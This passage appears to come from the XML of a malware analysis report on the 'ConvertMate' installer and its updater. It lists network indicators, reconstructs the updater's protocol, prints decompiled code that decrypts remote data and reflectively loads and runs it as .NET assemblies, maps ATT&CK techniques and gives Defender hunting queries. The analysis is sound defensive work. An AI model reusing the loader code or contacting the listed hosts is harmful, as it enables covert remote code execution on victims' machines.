            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>banifuri.com/pixel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Installer pixel/tracking request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hardcoded source string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>confetly.com/auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updater token request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hardcoded updater source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>confetly.com/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updater encrypted update request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hardcoded updater source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>confetly.com/iserr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updater error reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Constructed from endpoint string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>confetly.com/is5m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updater received-data MD5 reporting callback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Constructed from endpoint string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>chrialletworton.com/524c5f6f-7ad4-4468-a535-e7598d5af5a3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>External URL passed to process launch arguments in installer excerpt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Requires surrounding call-site analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>These are static network indicators. No live DNS resolution, successful C2 connection, server response, domain registration context, or reputation finding is established by the supplied excerpts. Do not open these URLs on an ordinary workstation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Authentication request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>GET https://confetly.com/auth</w:t>
        <w:br/>
        <w:t>Info: JsonConvert.SerializeObject(sessionInfo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SessionInfo contains ClientID and InstallationTimestamp. The former is read from id.txt; the latter is the UTC-formatted file creation time using yyyy-MM-dd HH:mm:ss. The server response body is used as the token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Update request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>GET https://confetly.com/update</w:t>
        <w:br/>
        <w:t>Authorization: Bearer &lt;token&gt;</w:t>
        <w:br/>
        <w:t>InstallTime: &lt;installation timestamp&gt;</w:t>
        <w:br/>
        <w:t>Time: &lt;DateTime.Now.ToString("yyyyMMddHHmmss")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The code uses HttpClient.GetStringAsync(url) and passes the response, installDate, and currentDate to the decrypt routine. This is a reconstructed protocol sketch, not captured packet data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Reporting behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Updater errors are transmitted using an HTTP POST to /iserr with error message, stack trace, and user_id appended; the exact wire body depends on string construction. A callback posts to /is5m a concatenation of MD5(received assembly bytes), the literal “1736335283364829”, and “&amp;user_id=” plus client ID. Meaning of the numeric literal is unknown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Encrypted update protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 AES and parsing code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>using Aes aes = Aes.Create();</w:t>
        <w:br/>
        <w:t>aes.Key = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(installDate));</w:t>
        <w:br/>
        <w:t>aes.IV = MD5.Create().ComputeHash(Encoding.UTF8.GetBytes(currentDate));</w:t>
        <w:br/>
        <w:t>using MemoryStream stream = new MemoryStream(JsonConvert.DeserializeObject&lt;byte[]&gt;(str));</w:t>
        <w:br/>
        <w:t>ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);</w:t>
        <w:br/>
        <w:t>CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);</w:t>
        <w:br/>
        <w:t>string text = new StreamReader(stream2).ReadToEnd();</w:t>
        <w:br/>
        <w:t>int num = text[text.Length - 1];</w:t>
        <w:br/>
        <w:t>return text.Substring(0, text.Length - num);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Observed updater code at approximately lines 314–325. The key is the SHA-256 digest of the installDate text; IV is the MD5 digest of the currentDate text sent via Time header. The code then trims the resulting string based on the numeric value of its final character. This step may represent custom trailing-character handling; it is not enough to identify standard padding behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>IEnumerable&lt;byte[]&gt; value =</w:t>
        <w:br/>
        <w:t xml:space="preserve">  JsonConvert.DeserializeObject&lt;IEnumerable&lt;byte[]&gt;&gt;(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.@this.decrypt(resp, installDate, currentDate));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This indicates decrypted content is interpreted as JSON containing a collection of byte arrays. The higher-level loop filters byte arrays where Length &gt; 0 and sends each nonempty item to UpdateManager.Update().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Security interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Encryption protects the delivered content from immediate static inspection of the updater binary. The date-derived inputs are deterministic and are not equivalent to independently generated random cryptographic secrets. The supplied code does not contain any captured ciphertext, decrypted response, or reconstructed payload. No inference should be made that an AES-protected response necessarily contained MediaArena.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. In-memory managed payload loading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 UpdateManager.Update() — decisive excerpt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>public void Update(byte[] data, FSharpFunc&lt;string, Unit&gt; send) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    string func = computeMD5String(data) + "1736335283364829" + "&amp;user_id=" + cid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    send.Invoke(func);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    FSharpOption&lt;Assembly&gt; option = loadOne(AppDomain.CurrentDomain, data);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (option == null) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Assembly value = option.Value;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    MethodInfo entryPoint = value.EntryPoint;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ((object)entryPoint == null) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    // Build string[] argument, then invoke the entry point reflectively.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    object obj2 = entryPoint.Invoke(null, new object[1] { array });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>internal FSharpOption&lt;Assembly&gt; loadOne(AppDomain defaultDomain, byte[] raw) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Assembly assembly = defaultDomain.Load(raw);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ((object)assembly == null) return null;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return ArrayModule.TryFind( ... , AppDomain.CurrentDomain.GetAssemblies());</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The in-memory load is supported directly by AppDomain.Load(byte[]), followed by reflection against the loaded assembly’s entry point. The assembly must be compatible managed code for this API to load it successfully. The evidence demonstrates an execution mechanism; it does not demonstrate a successful runtime payload execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Workflow and execution boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler launches updater under the configured account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Updater reads installation identity and obtains an authentication token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Updater retrieves an encrypted response and decrypts it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>JSON is converted to byte arrays and empty entries excluded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Each nonempty byte array is MD5-hashed and reported.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The updater attempts to load each byte array as a managed assembly and invoke its entry point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Why static string scanning failed to identify MediaArena</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The potentially relevant final managed assembly is retrieved at runtime rather than necessarily stored in ConvertMate.exe or UpdateRetreiver.exe. Consequently no MediaArena string need occur in either on-disk installer or updater. This is an explanation consistent with the code, not proof that MediaArena was remotely delivered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. MediaArena attribution and competing explanations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Hypothesis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Supporting evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Missing corroboration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MediaArena was delivered as an encrypted managed assembly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Remote AES update retrieval plus AppDomain.Load and reflective invocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Recovered response/payload, runtime event, Defender match</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MediaArena was bundled in Native.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>An installed executable is embedded in the ZIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Analysis of Convert Mate.exe, matching detection/hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MediaArena came via affiliate flow or another independent source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Affiliate stage and external URL invocation exist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Parent-child lineage, installer telemetry, exact file origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MediaArena detection was on the initial installer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Investigation began from suspicion about ConvertMate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Defender detection name/path/hash/timestamp and affected device</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. MITRE ATT&amp;CK mapping (provisional)</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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Code-level basis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Caution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1053.005 — Scheduled Task/Job: Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PowerShell COM registers daily ConvertMateTask.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Registration observed in script; successful endpoint creation not shown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1620 — Reflective Code Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>AppDomain.Load(raw) and MethodInfo.EntryPoint.Invoke().</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Capability directly observed; real execution not shown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1140 — Deobfuscate/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>AES decrypt routine for remotely retrieved data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Technique mapping is analytic, not proof of payload delivery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1071.001 — Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>HTTP(S) requests to auth/update/reporting endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Actual network connections not demonstrated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1027 — Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reversed Chrome strings and fragmented PowerShell identifiers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Code-level indicators only; exact adversarial objective unknown.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>ATT&amp;CK identifiers are analytical mappings based on broadly understood technique definitions and should be validated against the organization’s preferred ATT&amp;CK version before publication. Technique assignment does not establish adversary identity or malware-family attribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Recommended defensive validation and response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 Endpoint hunting priorities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Identify the original Defender alert’s detection name, SHA-256, file path, parent process, first-seen time, remediation status, and device identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hunt for scheduled task name ConvertMateTask and action path ending in ConvertMate\UpdateRetreiver.exe; confirm task XML, author, creation time, and last run result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Query DeviceProcessEvents for ConvertMate.exe, Convert Mate.exe, UpdateRetreiver.exe and parent-child relationships; account for alternate casing and renaming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Query DeviceNetworkEvents for domains confetly.com and banifuri.com in context of initiating executable and endpoint time window; absence of observations is not proof of no activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Inspect local filesystem, registry uninstall artifacts, and id.txt metadata. Preserve the original affected disk/EDR acquisition before cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Use EDR investigation to inspect .NET assembly loads, process memory, alerts, module metadata, and detection timeline if available. Do not expect every in-memory load to appear as a normal DeviceFileEvents creation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Contain affected hosts in accordance with incident-severity and business-impact requirements; block verified malicious indicators using change-controlled security policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Review whether installation occurred on additional devices and whether the daily updater could have executed prior to detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 Example Defender Advanced Hunting queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>DeviceProcessEvents</w:t>
        <w:br/>
        <w:t>| where FileName in~ ("ConvertMate.exe", "Convert Mate.exe", "UpdateRetreiver.exe")</w:t>
        <w:br/>
        <w:t>| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine</w:t>
        <w:br/>
        <w:t>| order by Timestamp desc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>DeviceNetworkEvents</w:t>
        <w:br/>
        <w:t>| where RemoteUrl has_any ("confetly.com", "banifuri.com")</w:t>
        <w:br/>
        <w:t>| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessSHA256, RemoteUrl, RemoteIP, ActionType</w:t>
        <w:br/>
        <w:t>| order by Timestamp desc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>DeviceFileEvents</w:t>
        <w:br/>
        <w:t>| where SHA256 in~ ("08b9f93000512b45f8c2e8d3d6624536b366e67c40fd4b958db58e3a1d129c3d", "d9f9584f4f071be9c5cf418cae91423c51d53ecf9924ed39b42028d1314a2edc", "09c2af472ab86b62a702e94a39df2bef09205f4249ed871cbeece751c1e7ef4f")</w:t>
        <w:br/>
        <w:t>| project Timestamp, DeviceName, ActionType, FileName, FolderPath, SHA256</w:t>
        <w:br/>
        <w:t>| order by Timestamp desc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>These queries are starting points; tenant retention and table availability may limit visibility. In-memory assemblies may never be written as files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Evidence gaps, limitations, and next steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 Critical missing artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Defender MediaArena detection record and malware-family naming context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Full binary exhibits and corresponding independent rehash verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Static decompilation of installed Convert Mate.exe and exported uninstaller archive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Raw memory or EDR evidence of UpdateRetreiver.exe loading an actual remotely delivered assembly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Actual response bodies, token issuance, server infrastructure history, and verified attribution to any campaign.</w:t>
      </w:r>
    </w:p>
